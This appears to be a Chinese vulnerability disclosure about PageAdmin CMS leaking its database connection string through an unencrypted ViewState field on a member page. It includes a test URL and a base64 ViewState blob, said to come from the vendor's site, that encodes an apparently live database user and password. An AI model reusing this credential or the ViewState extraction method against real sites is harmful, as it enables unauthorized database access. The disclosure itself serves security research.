本想找个注入的，却发现Isstr() 与其绕过不如***********（此处打码）直接来的痛快。

下载pageAdmin 反编译发现混淆过 蛋疼！

只好翻翻页面！各种页面各种翻

咿！尼玛 这是啥 ViewState["constr"]

那就抄刀上阵吧



打开 ：http://192.168.10.64:9992/e/member/index.aspx?s=1&type=mem_favolst


 

复制然后


 

这是在本地搭建的



那试试官网



附上官网的





/wEPDwUKMTc0NDY2MzU3Ng9kFgQCAg9kFgJmD2QWDmYPFgIeB1Zpc2libGVnZAIBDxYCHwBnZAIFDxYCHgtfIUl0ZW1Db3VudGZkAgkPFgIfAGdkAgoPFgIfAGdkAg0PFgIfAGdkAg4PFgIfAGhkAgQPZBYCZg8PFg4eBmNvbnN0cgVzUHJvdmlkZXI9U1FMT0xFREI7RGF0YSBTb3VyY2U9MTI3LjAuMC4xO0luaXRpYWwgQ2F0YWxvZz1zcV9wYWdlYWRtaW47VXNlciBJRD1zcV9wYWdlYWRtaW47UGFzc3dvcmQ9Z3VvanVueXUyMDA3MDgwNB4LQ3VycmVudFBhZ2VmHgxDYWxjdWxhdGVzcWwFTHNlbGVjdCAgY291bnQoaWQpIGFzIGNvIGZyb20gcGFfZm5jX2xpc3Qgd2hlcmUgdGhldHlwZT0xIGFuZCB1c2VybmFtZT0nRGFtbyceA3NxbAVOc2VsZWN0ICogZnJvbSBwYV9mbmNfbGlzdCB3aGVyZSB0aGV0eXBlPTEgYW5kIHVzZXJuYW1lPSdEYW1vJyBvcmRlciBieSBpZCBkZXNjHghQYWdlU3ppZQUCMjAeCVBhZ2VDb3VudGYeC1JlY29yZENvdW50ZmQWAmYPZBYUZg8QZGQWAWZkAgEPFgIfAWZkAgIPFgIeBFRleHQFATBkAgMPFgIfCQUBMWQCBA8WAh8JBQExZAIFDw8WAh4HRW5hYmxlZGhkZAIGDw8WAh8KaGRkAgcPDxYCHwpoZGQCCA8PFgIfCmhkZAIJDxBkEBUAFQAUKwMAFgBkZA==

解密
 

工具百度网盘不让上传需要的话 私信

修复方案：

老师常常教导我们：VIEWSTATE会害死我们的